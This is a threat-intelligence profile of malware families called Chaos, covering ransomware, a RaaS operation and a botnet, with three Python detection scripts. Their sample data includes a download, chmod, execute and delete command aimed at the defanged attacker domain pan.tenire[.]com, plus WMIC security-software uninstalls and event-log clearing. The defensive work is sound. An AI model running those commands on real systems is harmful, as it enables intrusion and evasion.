Chaos
Chaos is the name of several unrelated malware families and operations, most notably: (1) a Windows ransomware builder and the ransomware it produces, tracked since 2021; (2) a separate ransomware-as-a-service (RaaS) operation active since February 2025; and (3) a Go-based cross-platform botnet first documented in September 2022. The 2021-era builder produces Windows ransomware that persists via the Windows registry and the Startup folder, copies itself to %appdata% and to the root of attached drives, deletes shadow copies, delays execution, and enforces a single running instance. Reporting cited here notes that attackers used a leaked copy of the builder to create payloads, and that variants copied themselves to AppData as cmd.exe and dropped a cmd.url shortcut in the Startup folder. The leaked builder was also linked to the Twelve group, and Onyx ransomware was assessed to be based on Chaos: Onyx is a .NET ransomware that uses AES and RSA, appends .ampkcz, drops readme.txt, deletes shadow copies and the backup catalog, sets a RunOnce key for persistence, and overwrites files larger than 2 MB with random data rather than encrypting them. Twelve used leaked Chaos-built samples alongside LockBit-derived ransomware and Shamoon-like wipers in destructive attacks against Russian organizations.
Separately, a distinct Chaos RaaS operation was first observed in February 2025 and is assessed with moderate confidence to involve operators formerly linked to BlackSuit, Royal and Conti. It runs an open affiliate model, recruits on the RAMP forum, and conducts double- or triple-extortion attacks combining data theft, encryption and reported DDoS threats. It is a big-game-hunting operation that selects targets opportunistically; most known victims are in the United States, with further victims in the United Kingdom, New Zealand and India, and technology and financial services are the sectors specifically named. The intrusion chain usually opens with spam flooding followed by voice phishing that talks the victim into opening a Microsoft Quick Assist session; secondary access comes through unpatched edge devices or compromised RDP credentials. Post-compromise activity includes deploying remote management tools (AnyDesk, ScreenConnect, OptiTune, Syncro RMM, Splashtop Streamer); reverse SSH tunnels over port 443; reconnaissance of domain controllers, trusts, users, processes, DNS and LDAP; credential theft with Mimikatz and Kerberoasting; bulk password resets with net.exe; token impersonation; process masquerading; clearing event logs from PowerShell; attempts to remove security or MFA software via WMIC; hiding accounts through the Winlogon SpecialAccounts\UserList registry key; lateral movement over RDP, Impacket/SMB/WMI and the RMM tools; and exfiltration with GoodSync renamed to wininit.exe. The encryptor supports Windows, Linux, ESXi and NAS systems, uses Curve25519 ECDH with AES-256 and a unique key per file, selectively encrypts only part of each file, appends the .chaos extension, and drops a README.chaos.txt or readme.chaos.txt ransom note.
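Several of the post-compromise behaviours listed above (hidden accounts via SpecialAccounts\UserList, a GoodSync binary renamed to wininit.exe, log clearing from PowerShell, WMIC product uninstalls) leave telemetry that can be matched mechanically. The following Python is an added example, not code from the original page or from any vendor it cites: it runs four such checks over a constructed list of Sysmon-style records. The record field names (event_id, image, command_line, target_object, details) and the sample events are assumptions modelled on Sysmon event IDs 1 and 13; adapt them to your SIEM schema.

```python
"""Hunting checks for the Chaos RaaS post-compromise tradecraft above.

Added example, not code from the original page or any vendor it cites. Runs
four checks over constructed Sysmon-style records (event 1 = process
creation, event 13 = registry value set); field names are assumptions.
"""
import re

# Values written under this key hide the named account from the logon screen.
USERLIST_KEY = "\\winlogon\\specialaccounts\\userlist\\"

# Binaries Windows only ever starts from its own system directories.
SYSTEM_IMAGES = {"wininit.exe", "lsass.exe", "csrss.exe", "services.exe", "smss.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

LOG_CLEAR_RE = re.compile(r"clear-eventlog|wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)
WMIC_UNINSTALL_RE = re.compile(r"wmic(\.exe)?\s+product\b.*\bcall\s+uninstall", re.I)


def hidden_account(ev):
    """Registry write of 0 under Winlogon\\SpecialAccounts\\UserList."""
    return (ev.get("event_id") == 13
            and USERLIST_KEY in ev.get("target_object", "").lower()
            and ev.get("details", "").strip().lower() in ("dword (0x00000000)", "0"))


def masquerading(ev):
    """A core system binary name executing outside System32/SysWOW64."""
    image = ev.get("image", "").lower()
    name = image.rsplit("\\", 1)[-1]
    return (ev.get("event_id") == 1 and name in SYSTEM_IMAGES
            and not image.startswith(SYSTEM_DIRS))


def log_clearing(ev):
    """PowerShell Clear-EventLog or wevtutil clearing logs."""
    return ev.get("event_id") == 1 and bool(LOG_CLEAR_RE.search(ev.get("command_line", "")))


def wmic_uninstall(ev):
    """WMIC product uninstall, the route used against security/MFA agents."""
    return ev.get("event_id") == 1 and bool(WMIC_UNINSTALL_RE.search(ev.get("command_line", "")))


RULES = {
    "hidden_local_account": hidden_account,
    "system_binary_masquerade": masquerading,
    "event_log_clearing": log_clearing,
    "wmic_product_uninstall": wmic_uninstall,
}


def evaluate(events):
    """Return {rule_name: [indexes of matching events]} for rules that fired."""
    hits = {}
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(idx)
    return hits


# Constructed sample telemetry: a benign wininit.exe, then one record per behaviour.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": "C:\\Windows\\System32\\wininit.exe",
     "command_line": "wininit.exe"},
    {"event_id": 1, "image": "C:\\ProgramData\\sync\\wininit.exe",   # sync tool renamed
     "command_line": "wininit.exe /job exfil.gsj"},
    {"event_id": 13,
     "target_object": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
                      "\\SpecialAccounts\\UserList\\svc_backup",
     "details": "DWORD (0x00000000)"},
    {"event_id": 1, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell -c \"Get-EventLog -List | % { Clear-EventLog $_.Log }\""},
    {"event_id": 1, "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "command_line": "wmic product where \"name like '%Security%'\" call uninstall /nointeractive"},
]

if __name__ == "__main__":
    for rule, idxs in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idxs}")
```

The masquerade check deliberately keys on image path rather than hash, because the renamed binary is a legitimately signed sync tool; the hidden-account check fires on the write itself, so it catches the account before anyone notices it missing from the logon screen.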
Iranian MOIS-linked MuddyWater intrusions in early 2026 were dressed up as Chaos ransomware attacks as a false flag: the actors used Chaos branding and leak-site theatrics without deploying any file encryption.
A third, unrelated Chaos family was first documented by Lumen Black Lotus Labs in September 2022: Go-based cross-platform malware and botnet that historically targeted routers and edge devices and is assessed as a likely evolution of Kaiji. It can execute remote shell commands, load additional modules, spread by SSH brute-forcing, mine cryptocurrency, and launch DDoS attacks over HTTP, TLS, TCP, UDP and WebSocket. Variants observed in 2026 broadened targeting to misconfigured cloud and Linux server environments, including Apache Hadoop deployments, where attackers submitted malicious applications that download, chmod, execute, and then delete Chaos binaries fetched from domains such as pan.tenire[.]com. The updated samples are 64-bit ELF binaries that drop some of the older SSH-spreading and router-exploitation functions, keep persistence via systemd and keep-alive scripts, and add a SOCKS/SOCKS5 proxy capability to relay traffic and potentially pivot into internal networks. Embedded infrastructure included gmserver[.]osfc[.]org[.]cn; Chinese-language artifacts, zh-CN locale indicators, and infrastructure overlap with ValleyRAT/Silver Fox activity were cited as circumstantial signs of possible Chinese origin, but attribution remains unconfirmed.
Groups observed using it
6 distinct threat actors attributed by public researchers.
While the Chaos ransomware variant copied itself to $user\$appdata\cmd.exe and launched a new process, the new process in turn created a new file in the startup folder.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files.
The CyberVolk collective is a prime example of how readily threat actors can access and deploy dangerous ransomware builders such as AzzaSec, Diamond, LockBit, Chaos and others.
Nation-state hackers from Iran are deploying the Chaos ransomware as cover for alleged espionage and data theft operations... The Chaos ransomware operation has existed since February 2025...
A newly emerged ransomware-as-a-service (RaaS) gang called Chaos is likely made up of former members of the BlackSuit crew... Chaos, which sprang forth in February 2025...
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
One of the more interesting functions of Chaos version 1.0 was its worming function, which allowed it to spread to all drives found on an affected system. This could permit the malware to jump onto removable drives and escape from air-gapped systems.
Darktrace said it identified the new variant targeting its honeypot network last month, a deliberately misconfigured Hadoop instance that enables remote code execution on the service. In the attack spotted by the cybersecurity company, the intrusion commenced with an HTTP request to the Hadoop deployment to create a new application.
Execution
5 techniques
the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time
Chaos is a cross-platform malware that can run remote shell commands...
The application, for its part, embedded a sequence of shell commands to retrieve a Chaos agent binary from an attacker-controlled server ('pan.tenire[.]com'), set permissions to allow all users to read, modify, or run it ('chmod 777'), and then actually execute the binary and delete the artifact from disk to minimize the forensic trail.
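The Hadoop application-submission chain quoted above (fetch, chmod 777, run, delete) is easy to recognise once the submitted command is pulled out of the request. The following Python is an added example, not Darktrace's or Lumen's code: it parses constructed request records shaped like a YARN ResourceManager REST submission (a POST to /ws/v1/cluster/apps whose am-container-spec carries the shell command), splits the command into pipeline segments, and scores how many stages of the chain are present. The request records, the application names and the second download host are constructed; the domain from the reporting is kept defanged.

```python
"""Triage YARN ResourceManager application submissions for the download-chmod-run-delete chain.

Added example, not Darktrace's or Lumen's code. The YARN REST API accepts a
POST to /ws/v1/cluster/apps whose am-container-spec carries a shell command
that the cluster runs; the request records below are constructed to mimic
what an access log or honeypot might capture. IOC strings stay defanged.
"""
import json
import re

SUBMIT_PATH = "/ws/v1/cluster/apps"

# One regex per stage of the chain, applied to individual pipeline segments.
STAGES = {
    "download": re.compile(r"\b(curl|wget)\b.*https?://", re.I),
    "chmod":    re.compile(r"\bchmod\s+(?:[0-7]*7[0-7]*|[ugoa]*\+[rwx]*x)\b", re.I),
    "execute":  re.compile(r"^(?:nohup\s+|sh\s+|bash\s+)?(?:\./|/tmp/|/dev/shm/|/var/tmp/)\S+", re.I),
    "cleanup":  re.compile(r"\brm\s+(?:-\w+\s+)*\S+", re.I),
}
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")
URL_HOST_RE = re.compile(r"https?://([^/\s]+)", re.I)


def extract_submission(request):
    """Return (application_name, shell_command) for an app submission, else None."""
    if request.get("method") != "POST" or request.get("path") != SUBMIT_PATH:
        return None
    try:
        body = json.loads(request.get("body", ""))
        cmd = body["am-container-spec"]["commands"]["command"]
    except (ValueError, KeyError, TypeError):
        return None
    return body.get("application-name", "?"), cmd


def analyse_command(cmd):
    """Return ({stage: first matching segment}, [download hosts]) for a shell command."""
    found, hosts = {}, []
    for seg in filter(None, SPLIT_RE.split(cmd)):
        for stage, rx in STAGES.items():
            if stage not in found and rx.search(seg):
                found[stage] = seg
        hosts.extend(URL_HOST_RE.findall(seg))
    return found, hosts


def triage(requests, min_stages=3):
    """Return [(app_name, sorted stages, hosts)] for submissions hitting >= min_stages."""
    alerts = []
    for req in requests:
        sub = extract_submission(req)
        if sub is None:
            continue
        name, cmd = sub
        found, hosts = analyse_command(cmd)
        if len(found) >= min_stages:
            alerts.append((name, sorted(found), hosts))
    return alerts


def _submission(name, command):
    """Build a constructed app-submission record with the YARN JSON layout."""
    return {"method": "POST", "path": SUBMIT_PATH, "body": json.dumps({
        "application-name": name,
        "am-container-spec": {"commands": {"command": command}},
        "application-type": "YARN"})}


# Constructed requests: a read-only query, a legitimate job, and the staging chain.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/ws/v1/cluster/info", "body": ""},
    _submission("etl-nightly", "/opt/spark/bin/spark-submit --class com.example.Job job.jar"),
    _submission("x", "curl -fsSL http://pan.tenire[.]com/x -o /tmp/x; chmod 777 /tmp/x; "
                     "/tmp/x; rm -f /tmp/x"),
]

if __name__ == "__main__":
    for name, stages, hosts in triage(SAMPLE_REQUESTS):
        print(f"app {name!r}: stages {stages}, download hosts {hosts}")
```

Scoring by stage count rather than by a fixed string keeps the rule useful when the attacker swaps curl for wget or /tmp for /dev/shm; the extracted hosts are what you feed into IOC enrichment. The underlying exposure is a ResourceManager reachable without authentication, so the detection complements, and does not replace, turning on Hadoop authentication and network-restricting the RM port.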
Persistence
4 techniques
the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time
The malware establishes persistence using systemd and stores a keep-alive script on disk.
For example, the persistence mechanism was always via the registry, but the exact implementation differed by family. Most of the time, autorun was used, but we’ve also seen them using the startup folder.
While the Chaos ransomware variant copied itself to $user\$appdata\cmd.exe and launched a new process, the new process in turn created a new file in the startup folder: $user\$appdata\Microsoft\Windows\Start Menu\Programs\Startup\cmd.url. This contained the path to the ransomware file
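The cmd.url artifact quoted above is an Internet Shortcut: INI text whose [InternetShortcut] URL= value Windows opens at logon when the file sits in a Startup folder, so a shortcut whose target is a local executable under AppData is worth a look on any host. The following Python is an added example, not Kaspersky's code: it parses shortcut contents with the standard library and flags targets that are local executables, live in user-writable directories, or borrow a system binary's name outside the Windows directory. The three sample shortcut files are constructed.

```python
"""Audit Startup-folder .url shortcuts for the cmd.url-style persistence quoted above.

Added example, not Kaspersky's code. An Internet Shortcut (.url) is INI text
whose [InternetShortcut] URL= value Windows opens at logon when the file is
in a Startup folder. assess() flags targets that are local executables, sit in
user-writable directories, or borrow a system binary's name outside the
Windows directory. The sample shortcut contents are constructed.
"""
import configparser
import re
from pathlib import PureWindowsPath
from urllib.parse import unquote, urlparse

SYSTEM_NAMES = {"cmd.exe", "svchost.exe", "wininit.exe", "explorer.exe", "rundll32.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
EXEC_EXT = {".exe", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".dll"}
DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:\\")


def shortcut_target(text):
    """Return the URL= value from [InternetShortcut], or None if absent/malformed."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str            # keep key case; match it ourselves below
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            for key, value in cp[section].items():
                if key.lower() == "url":
                    return value.strip()
    return None


def local_path(target):
    """Map a file:// URL, UNC path or drive path to a PureWindowsPath; None for web URLs."""
    if DRIVE_PATH_RE.match(target) or target.startswith("\\\\"):
        return PureWindowsPath(target)
    parsed = urlparse(target)
    if parsed.scheme != "file":
        return None
    path = unquote(parsed.path)
    if parsed.netloc:                                  # file://server/share/x -> \\server\share\x
        return PureWindowsPath("\\\\" + parsed.netloc + path.replace("/", "\\"))
    return PureWindowsPath(path.lstrip("/")) if path.strip("/") else None


def assess(text):
    """Return the reasons a Startup .url looks suspicious; an empty list means clean."""
    target = shortcut_target(text)
    if target is None:
        return ["no URL= value in [InternetShortcut]"]
    path = local_path(target)
    if path is None:
        return []                                      # ordinary web link
    low = str(path).lower()
    reasons = []
    if path.suffix.lower() in EXEC_EXT:
        reasons.append("target is a local executable")
    if any(d in low for d in USER_WRITABLE):
        reasons.append("target lives in a user-writable location")
    if path.name.lower() in SYSTEM_NAMES and "\\windows\\" not in low:
        reasons.append(f"target borrows system binary name {path.name} outside the Windows directory")
    return reasons


def audit(shortcuts):
    """Return {filename: reasons} for every shortcut that is not clean."""
    results = {name: assess(text) for name, text in shortcuts.items()}
    return {name: reasons for name, reasons in results.items() if reasons}


# Constructed contents of three Startup-folder shortcuts.
SAMPLE_SHORTCUTS = {
    "cmd.url": "[InternetShortcut]\nURL=file:///C:/Users/alice/AppData/Roaming/cmd.exe\nIconIndex=0\n",
    "update.url": "[InternetShortcut]\nURL=C:\\Users\\alice\\AppData\\Local\\Temp\\update.bat\n",
    "intranet.url": "[InternetShortcut]\nURL=https://intranet.example.com/\n",
}

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_SHORTCUTS).items():
        print(name, "->", "; ".join(reasons))
```

To use it on a live system, read each *.url under the per-user and all-users Startup folders into the dictionary; the function only inspects content, so it runs equally well over files collected from a disk image.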
Privilege Escalation
5 techniques
the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time
they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain
Stealth
2 techniques
Defense Impairment
2 techniques
Credential Access
2 techniques
Discovery
1 technique
Lateral Movement
3 techniques
It also has the kind of tradecraft defenders should not shrug off: social engineering, remote-management abuse, payload retrieval, staging, and leaked data.
Command and Control
5 techniques
The command-and-control server is reached through an embedded domain, gmserver[.]osfc[.]org[.]cn, which at the time of analysis resolved to an IP address geolocated to Hong Kong.
The new 64-bit ELF binary has removed SSH propagation and router exploit functions, replacing them with a SOCKS proxy feature to ferry traffic and conceal malicious activity.
When the malware receives a StartProxy command from the command-and-control (C2) server, it will begin listening on an attacker-controlled TCP port and operates as a SOCKS5 proxy.
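A compromised router or Linux server that starts answering SOCKS5 on an arbitrary TCP port, and relaying CONNECT requests toward private addresses, looks exactly like the StartProxy behaviour quoted above from the network side. The following Python is an added example, not Lumen's or Darktrace's code: it decodes the client's SOCKS5 greeting and request (RFC 1928) from captured client-side payload bytes and reports whether the requested destination is an internal address. It assumes the server picked the no-authentication method whenever the client offered it; the three sample payloads are constructed.

```python
"""Recognise SOCKS5 handshakes (RFC 1928) in captured client-side TCP payloads.

Added example, not Lumen's or Darktrace's code. A router or Linux server that
starts accepting SOCKS5 greetings on some TCP port and relaying CONNECT
requests toward private addresses is behaving like the proxy module described
above. parse_socks5() decodes the client's greeting and request; it assumes
the server selected the no-authentication method when the client offered it.
Sample payloads are constructed.
"""
import ipaddress
import struct

NO_AUTH = 0x00
COMMANDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}


def parse_greeting(buf):
    """Return (offered auth methods, bytes consumed), or None if not a SOCKS5 greeting."""
    if len(buf) < 2 or buf[0] != 0x05:
        return None
    n_methods = buf[1]
    if n_methods == 0 or len(buf) < 2 + n_methods:
        return None
    return list(buf[2:2 + n_methods]), 2 + n_methods


def parse_request(buf):
    """Return {cmd, host, port, consumed} for a SOCKS5 request, or None if malformed."""
    if len(buf) < 4 or buf[0] != 0x05 or buf[2] != 0x00 or buf[1] not in COMMANDS:
        return None
    atyp = buf[3]
    if atyp == 0x01 and len(buf) >= 10:                                # IPv4
        host, end = str(ipaddress.IPv4Address(bytes(buf[4:8]))), 8
    elif atyp == 0x04 and len(buf) >= 22:                              # IPv6
        host, end = str(ipaddress.IPv6Address(bytes(buf[4:20]))), 20
    elif atyp == 0x03 and len(buf) >= 5 and len(buf) >= 7 + buf[4]:   # length-prefixed FQDN
        host, end = bytes(buf[5:5 + buf[4]]).decode("ascii", "replace"), 5 + buf[4]
    else:
        return None
    (port,) = struct.unpack("!H", buf[end:end + 2])
    return {"cmd": COMMANDS[buf[1]], "host": host, "port": port, "consumed": end + 2}


def parse_socks5(client_stream):
    """Decode greeting + request from a client's first bytes; None when not SOCKS5."""
    greeting = parse_greeting(client_stream)
    if greeting is None:
        return None
    methods, offset = greeting
    finding = {"methods": methods, "internal_target": False}
    if NO_AUTH not in methods:
        # Username/password (0x02) or GSSAPI (0x01) inserts a sub-negotiation before the request.
        finding["note"] = "authenticated method only; request follows sub-negotiation"
        return finding
    request = parse_request(client_stream[offset:])
    if request is None:
        finding["note"] = "greeting only"
        return finding
    finding.update(request)
    try:
        finding["internal_target"] = ipaddress.ip_address(request["host"]).is_private
    except ValueError:
        pass                                            # FQDN: resolve out of band first
    return finding


# Constructed payloads: a pivot toward an RFC 1918 RDP host, a domain CONNECT, and plain HTTP.
SAMPLE_PIVOT = (b"\x05\x01\x00"
                + b"\x05\x01\x00\x01" + ipaddress.IPv4Address("10.0.0.5").packed
                + struct.pack("!H", 3389))
SAMPLE_DOMAIN = (b"\x05\x02\x00\x02"
                 + b"\x05\x01\x00\x03" + bytes([11]) + b"example.com" + struct.pack("!H", 443))
SAMPLE_HTTP = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"

if __name__ == "__main__":
    for label, payload in (("pivot", SAMPLE_PIVOT), ("domain", SAMPLE_DOMAIN), ("http", SAMPLE_HTTP)):
        print(label, parse_socks5(payload))
```

Run this over the first packets of inbound sessions to ports where the device has no business speaking SOCKS; an internal_target of True on an edge device is the pivot case the reporting warns about, and the offered-methods list tells you whether the operator bothered to password-protect the relay.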
Exfiltration
2 techniques
Impact
6 techniques
Instead of encrypting files (which could then be decrypted after the target paid the ransom), it replaced the files’ contents with random bytes, after which the files were encoded in Base64. This meant that affected files could no longer be restored
The attackers used a version of the popular LockBit 3.0 ransomware... to encrypt the data
The second version of Chaos added advanced options for administrator privileges, the ability to delete all volume shadow copies and the backup catalog, and the ability to disable Windows recovery mode.
In addition, it gives the ransomware builder’s users the ability to add their own extensions to affected files and the ability to change the desktop wallpaper of their victims.
IOCs tracked for this family
88 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
50 sources tracked across advisories, community write-ups, and news.
Ransomware derived from a leaked builder and used in some incidents to encrypt files; static analysis linked samples to the Twelve group.
A ransomware variant used by Key Group that copied itself into AppData, launched a new process, and created a startup-folder URL file for persistence.
Chaos is a ransomware-as-a-service operation associated with double-extortion attacks involving data exfiltration and file encryption. In the reported intrusion, its branding and artifacts were used as a false flag, but no encryption occurred.
Ransomware brand used as cover for espionage and data theft operations. In the described incident, attackers conducted social engineering via Microsoft Teams, gained access, stole data, extorted the victim, and notably did not encrypt files, suggesting use of the ransomware label to obscure attribution and operational intent.